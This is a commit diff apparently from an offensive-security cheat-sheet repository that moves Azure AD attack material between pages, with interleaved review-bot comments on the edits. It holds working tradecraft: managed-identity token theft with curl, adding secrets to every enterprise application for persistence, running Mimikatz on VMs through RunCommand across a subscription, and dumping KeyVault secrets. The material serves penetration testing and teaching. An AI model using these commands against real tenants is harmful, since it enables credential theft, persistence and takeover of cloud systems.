Devices and Services

pull/2/head
Swissky 2023-11-26 20:40:13 +01:00
parent f7bd9bb527
commit d3b66447cd
6 changed files with 199 additions and 205 deletions

View File

@ -14,14 +14,6 @@
* [Stealing Tokens](#stealing-tokens) * [Stealing Tokens](#stealing-tokens)
* [Stealing tokens from az cli](#stealing-tokens-from-az-cli) * [Stealing tokens from az cli](#stealing-tokens-from-az-cli)
* [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell) * [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell)
* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications)
* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app)
* [Azure Storage Blob](#azure-storage-blob)
* [Enumerate blobs](#enumerate-blobs)
* [SAS URL](#sas-url)
* [List and download blobs](#list-and-download-blobs)
* [Virtual Machine RunCommand](#virtual-machine-runcommand)
* [KeyVault Secrets](#keyvault-secrets)
* [Pass The Certificate](#pass--the-certificate) * [Pass The Certificate](#pass--the-certificate)
* [Pass The PRT](#pass-the-prt) * [Pass The PRT](#pass-the-prt)
* [Intunes Administration](#intunes-administration) * [Intunes Administration](#intunes-administration)
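Review bot: the eight TOC entries removed here (Add Credentials to All Enterprise Applications through KeyVault Secrets) are not replaced by anything that tells the reader where those sections went, so the main page's table of contents silently loses the RunCommand, Storage Blob, KeyVault and Web App material. Add one entry per destination page (the new `# Azure Services` and `# Azure Persistence` files in this commit), in whatever link style the rest of this TOC uses for sibling pages, so navigation still covers the moved content.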
@ -188,81 +180,6 @@
``` ```
* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API * [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
## Enumeration
## Enumeration methodology
```powershell
# Check Azure Joined
PS> dsregcmd.exe /status
+----------------------------------------------------------------------+
| Device State |
+----------------------------------------------------------------------+
AzureAdJoined : YES
EnterpriseJoined : NO
DomainJoined : NO
Device Name : jumpvm
# Enumerate resources
PS Az> Get-AzResource
# Enumerate role assignments
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>`
# Get info on a role
PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get info user
PS AzureAD> Get-AzureADUser -ObjectId <ID>
PS AzureAD> Get-AzureADUser -ObjectId test@<TENANT NAME>.onmicrosoft.com | fl *
# List all groups
PS AzureAD> Get-AzureADGroup -All $true
# Get members of a group
PS Az> Get-AzADGroup -DisplayName '<GROUP-NAME>'
PS Az> Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
# Get Azure AD information
PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
PS AADInternals> Get-AADIntLoginInformation -UserName admin@<TENANT NAME>.onmicrosoft.com
PS AADInternals> Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com # Get Tenant ID
PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName <DOMAIN> # Get all the information
# Check if there is a user logged-in to az cli
PS> az ad signed-in-user show
# Check AppID Alternative Names/Display Name
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
# Get all application objects registered using the current tenant
PS AzureAD> Get-AzureADApplication -All $true
# Get all details about an application
PS AzureAD> Get-AzureADApplication -ObjectId <ID> | fl *
# List all VM's the user has access to
PS Az> Get-AzVM
PS Az> Get-AzVM | fl
# Get all function apps
PS Az> Get-AzFunctionApp
# Get all webapps
PS Az> Get-AzWebApp
PS Az> Get-AzWebApp | select-object Name, Type, Hostnames
# List all storage accounts
PS Az> Get-AzStorageAccount
PS Az> Get-AzStorageAccount | fl
# List all keyvaults
PS Az> Get-AzKeyVault
```
## Token from Managed Identity ## Token from Managed Identity
> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**. > **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**.
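Review bot: most of this removed Enumeration block is re-homed elsewhere in this commit, but several commands are dropped outright and reappear nowhere: `Get-AzRoleDefinition -Name "Virtual Machine Command Executor"`, both `Get-AzureADUser -ObjectId` lookups, `az ad signed-in-user show`, `Get-AzureADApplication -ObjectId <ID> | fl *`, `Get-AzWebApp | select-object Name, Type, Hostnames` and the `Import-Module C:\Tools\AADInternals\AADInternals.psd1` line. If this is meant as a move rather than a cut, carry those into the enumeration page as well; `Get-AzRoleDefinition` in particular is the step that shows what a custom role like "Virtual Machine Command Executor" actually grants before you rely on it. On the plus side, the stray trailing backtick on the `Get-AzRoleAssignment -Scope ...` line does not survive in the moved copy.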
@ -430,123 +347,6 @@ az account get-access-token --resource-type aad-graph
* Users can save tokens using `Save-AzContext` * Users can save tokens using `Save-AzContext`
## Add credentials to all Enterprise Applications
```powershell
# Add secrets
PS > . C:\Tools\Add-AzADAppSecret.ps1
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
# Use secrets to authenticate as Service Principal
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
```
## Spawn SSH for Azure Web App
```powershell
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
```
## Azure Storage Blob
* Blobs - `*.blob.core.windows.net`
* File Services - `*.file.core.windows.net`
* Data Tables - `*.table.core.windows.net`
* Queues - `*.queue.core.windows.net`
### Enumerate blobs
```powershell
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
Found Storage Account - testsecure.blob.core.windows.net
Found Storage Account - securetest.blob.core.windows.net
Found Storage Account - securedata.blob.core.windows.net
Found Storage Account - securefiles.blob.core.windows.net
```
### SAS URL
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
* Click on **Open Connect Dialog** in the left menu.
* Select **Blob container**.
* On the **Select Authentication Method** page
* Select **Shared access signature (SAS)** and click on Next
* Copy the URL in **Blob container SAS URL** field.
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
### List and download blobs
```powershell
PS Az> Get-AzResource
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
```
## Virtual Machine RunCommand
Requirements:
* `Microsoft.Compute/virtualMachines/runCommand/action`
```powershell
# Get Public IP of VM : query the network interface
PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
# Execute Powershell script on the VM
PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
# Connect via WinRM
PS C:\Tools> $password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password)
PS C:\Tools> $sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
PS C:\Tools> Enter-PSSession $sess
```
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System
```powershell
# List available VMs
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
ResourceGroupName Name
----------------- ----
TESTRESOURCES Remote-Test
# Execute Powershell script on the VM
PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
```
Against the whole subscription using MicroBurst.ps1
```powershell
Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
```
## KeyVault Secrets
```powershell
# keyvault access token
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
# connect
PS> $token = 'eyJ0..'
PS> $keyvaulttoken = 'eyJ0..'
PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
# query the vault and the secrets
PS Az> Get-AzKeyVault
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
```
## Pass The PRT ## Pass The PRT
> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on). > MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on).
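Review bot: this removal is a clean move (Add credentials, Web App SSH, Storage Blob, RunCommand and KeyVault all reappear in the new Azure Persistence and Azure Services pages), but the two KeyVault `curl` lines now also land in the Azure AD Tokens page, and the two copies already disagree: the Tokens copy writes `api-version=2017-09-01` while the Services copy keeps `apiversion=2017-09-01` from here. Keep the managed-identity request in one place and link to it from the other, so the next fix does not have to be made twice.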

View File

@ -1,5 +1,19 @@
# Azure AD Tokens # Azure AD Tokens
## Connection
After a successfull authentication, you will get an access token.
* az cli
* Azure AD Powershell
* Az Powershell
* External HTTP API
* Internal HTTP API
```ps1
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
```
## Access Token ## Access Token
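Review bot: the new Connection list names five ways to obtain a token (az cli, Azure AD PowerShell, Az PowerShell, external HTTP API, internal HTTP API) but only the internal managed-identity endpoint gets an example, so four of the bullets are headings with no content; either add the one-liner for each or cut the list down to what has a command. Minor: `successfull` -> `successful`. The two `curl` lines themselves are right as written (`api-version` with the hyphen, `secret` header for the 2017-09-01 endpoint); the same request in the Azure Services page of this commit is spelled `apiversion` and should be brought in line with this copy.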

View File

@ -9,10 +9,21 @@
## Users ## Users
* List users: `Get-AzureADUser -All $true` * List users: `Get-AzureADUser -All $true`
* Enumerate groups: `Get-AzureADGroup -All $true` * Enumerate groups
```ps1
# List groups
Get-AzureADGroup -All $true
# Get members of a group
Get-AzADGroup -DisplayName '<GROUP-NAME>'
Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
```
* Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember` * Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember`
* List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName` * List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName`
* Add user to a group * Add user to a group
```ps1 ```ps1
$groupid = "<group-id>" $groupid = "<group-id>"
$targetmember = "<user-id>" $targetmember = "<user-id>"
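Review bot: the new Enumerate groups block mixes two modules without saying so: `Get-AzureADGroup` is the AzureAD module, while `Get-AzADGroup` and `Get-AzADGroupMember` are Az (Az.Resources), and a reader with only one of them loaded gets a not-recognized error on the other. A short comment per line (`# AzureAD module` / `# Az module`), the way the Azure Services page distinguishes them with `PS Az>` and `PS AzureAD>` prompts, would make the block self-explanatory. Also, the bullet was shortened from `Enumerate groups: \`Get-AzureADGroup -All $true\`` to `Enumerate groups`, which is fine, but the `# List groups` comment directly underneath now says the same thing twice.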
@ -49,6 +60,20 @@ Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
``` ```
### Device State
```ps1
PS> dsregcmd.exe /status
+----------------------------------------------------------------------+
| Device State |
+----------------------------------------------------------------------+
AzureAdJoined : YES
EnterpriseJoined : NO
DomainJoined : NO
Device Name : jumpvm
```
### Join Devices ### Join Devices
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device) * [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
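Review bot: the new Device State block is the only item in this file that runs on the host rather than against the directory, and nothing says so. A lead sentence stating that `dsregcmd.exe /status` is executed locally on a Windows machine you already have a session on, and that the three join flags are what to read (`AzureAdJoined : YES` with `DomainJoined : NO` is a cloud-only join; both `YES` is the hybrid-joined case that the Pass The PRT section refers to), would turn the raw output into something the reader can act on.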

View File

@ -20,16 +20,19 @@
* Federation with Azure AD or O365 * Federation with Azure AD or O365
```powershell ```powershell
Get-AADIntLoginInformation -UserName <USER>@<TENANT NAME>.onmicrosoft.com
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1 https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1 https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
``` ```
* Get the Tenant ID * Get the Tenant ID
```powershell ```powershell
Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
``` ```
### Enumerate Email ### Enumerate Email
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute. > By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
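Review bot: dropping `Get-AADIntLoginInformation` and `Get-AADIntTenantID` here, on top of the same two cmdlets being removed from the README's Enumeration block in this commit, means the AADInternals one-liners for realm and tenant-ID lookup disappear from the page set entirely, while the module is still relied on a few lines later (`Invoke-AADIntReconAsOutsider`). If the `getuserrealm.srf` and `.well-known/openid-configuration` URLs are meant to replace them, say so in the bullet; otherwise keep one line each, since readers who have AADInternals loaded will reach for the cmdlet first.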
@ -60,6 +63,7 @@ PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Ve
Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/) Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
```ps1 ```ps1
Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
``` ```
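Review bot: the added `Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>` duplicates the existing `Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table` line directly below it; the only differences are the placeholder and the parameter spelling. Keep one. The full parameter name is `-DomainName`; `-Domain` only works because PowerShell accepts an unambiguous prefix, so if a single line stays it should be the `-DomainName` form.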
@ -80,13 +84,33 @@ Subdomain Service
* Using Az Powershell module * Using Az Powershell module
```powershell ```powershell
# Enumerate resources
PS Az> Get-AzResource PS Az> Get-AzResource
PS Az> Get-AzVM | fl
# List all VM's the user has access to
PS Az> Get-AzVM
# Get all webapps
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
# Get all function apps
PS Az> Get-AzFunctionApp PS Az> Get-AzFunctionApp
PS Az> Get-AzStorageAccount | fl
# List all storage accounts
PS Az> Get-AzStorageAccount
# List all keyvaults
PS Az> Get-AzKeyVault PS Az> Get-AzKeyVault
# Get all application objects registered using the current tenant
PS AzureAD> Get-AzureADApplication -All $true
# Enumerate role assignments
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
# Check AppID Alternative Names/Display Name
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
``` ```
* Using az cli * Using az cli
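Review bot: two AzureAD-module cmdlets (`Get-AzureADApplication -All $true` and `Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl`) are inserted under the `* Using Az Powershell module` bullet; the `PS AzureAD>` prompt flags the mismatch, but the bullet heading is now wrong. Move them into an AzureAD block or rename the bullet. Also, `Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/...` carries a hard-coded `RESEARCH` resource group from the lab it was written in; `<RG-NAME>` matches the placeholders used in the rest of the block.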

View File

@ -0,0 +1,16 @@
# Azure Persistence
## Add secrets to application
* Add secrets with [lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1](https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1)
```powershell
PS > . C:\Tools\Add-AzADAppSecret.ps1
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
```
* Use secrets to authenticate as Service Principal
```ps1
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
```
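Review bot: the new page's heading `## Add secrets to application` understates what the script does; the section it replaces was titled `Add credentials to all Enterprise Applications`, and that `all` is the operationally important detail (the script touches every application the token can write to, which is loud in the audit log and hard to undo quietly). Keep the old wording or add a sentence saying so. Also `$graphtoken` appears from nowhere: a line stating that it must hold a Graph access token for the current user, with a pointer to the Azure AD Tokens page in this commit for how to obtain one, is the missing step between the two blocks.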

View File

@ -1,6 +1,52 @@
# Azure Services # Azure Services
## Azure Runbook ## Virtual Machine
### RunCommand
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as `NT Authority\System`
**Requirements**:
* `Microsoft.Compute/virtualMachines/runCommand/action`
* List available Virtual Machines
```powershell
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
ResourceGroupName Name
----------------- ----
TESTRESOURCES Remote-Test
```
* Get Public IP of VM by querying the network interface
```powershell
PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
```
* Execute Powershell script on the VM, like `adduser`
```ps1
PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
PS Azure C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
```
* Finally you should be able to connect via WinRM
```ps1
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('username', $Password)
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
```
Against the whole subscription using `MicroBurst.ps1`
```powershell
Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
```
## Runbook
Runbook must be **SAVED** and **PUBLISHED** before running it. Runbook must be **SAVED** and **PUBLISHED** before running it.
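Review bot: the VM RunCommand section mixes prompts and modules in a way that will trip readers: `Get-AzVM`, `Get-AzNetworkInterface`, `Get-AzPublicIpAddress` and `Invoke-AzVMRunCommand` are Az cmdlets but are shown under a `PS AzureAD>` prompt, while `Get-AzureRmVM`, `Invoke-AzureRmVMRunCommand` and `Invoke-AzureRmVMBulkCMD` are the retired AzureRM module under `PS C:\>` and an odd `PS Azure C:\>`. Normalise on `PS Az>` and the Az cmdlets, and keep the AzureRM forms only with a note that they need the old module (and check whether the MicroBurst bulk cmdlet has an Az flavour before keeping the AzureRM one). One more gap: "Finally you should be able to connect via WinRM" depends entirely on what `adduser.ps1` did; a comment that the script is expected to create the local account passed to `New-PSSession` would close the loop.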
@ -41,7 +87,7 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
``` ```
## Azure Service Principal ## Service Principal
* Generate a new service principal password/secret * Generate a new service principal password/secret
```ps1 ```ps1
@ -58,6 +104,75 @@ Runbook must be **SAVED** and **PUBLISHED** before running it.
``` ```
## KeyVault
* Keyvault access token
```powershell
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
```
* Connect with the access token
```ps1
PS> $token = 'eyJ0..'
PS> $keyvaulttoken = 'eyJ0..'
PS> $accid = '2e...bc'
PS Az> Connect-AzAccount -AccessToken $token -AccountId $accid -KeyVaultAccessToken $keyvaulttoken
```
* Query the vault and the secrets
```ps1
PS Az> Get-AzKeyVault
PS Az> Get-AzKeyVaultSecret -VaultName <VaultName>
PS Az> Get-AzKeyVaultSecret -VaultName <VaultName> -Name Reader -AsPlainText
```
## Azure Storage Blob
* Blobs - `*.blob.core.windows.net`
* File Services - `*.file.core.windows.net`
* Data Tables - `*.table.core.windows.net`
* Queues - `*.queue.core.windows.net`
### Enumerate blobs
```powershell
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
Found Storage Account - redacted.blob.core.windows.net
```
### List and download blobs
```powershell
PS Az> Get-AzResource
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
```
### SAS URL
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
* Click on **Open Connect Dialog** in the left menu.
* Select **Blob container**.
* On the **Select Authentication Method** page
* Select **Shared access signature (SAS)** and click on Next
* Copy the URL in **Blob container SAS URL** field.
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
## Azure Web App
### SSH Connection
```powershell
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
```
## Azure Devops ## Azure Devops
* Verify the validity of an Azure Personal Access Token (PAT) * Verify the validity of an Azure Personal Access Token (PAT)
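Review bot: the two managed-identity `curl` lines in the KeyVault block are broken as written: the query parameter is `api-version`, not `apiversion`, and the identity endpoint requires it (the same request in the Azure AD Tokens page of this commit spells it correctly). Fix that before the block is copied again. Secondary points in the same hunk: `Get-AzStorageBlobContent ... -Blob` ends with a parameter and no blob name (add `<BLOB-NAME>` and a `-Destination`), and the `:warning: You can also use \`subscription\`(username/password)` line does not say what `subscription` refers to; spell out that it means an Azure account with rights on the subscription, as used by the `Get-AzStorageAccount ... .context` block above, rather than a SAS URL.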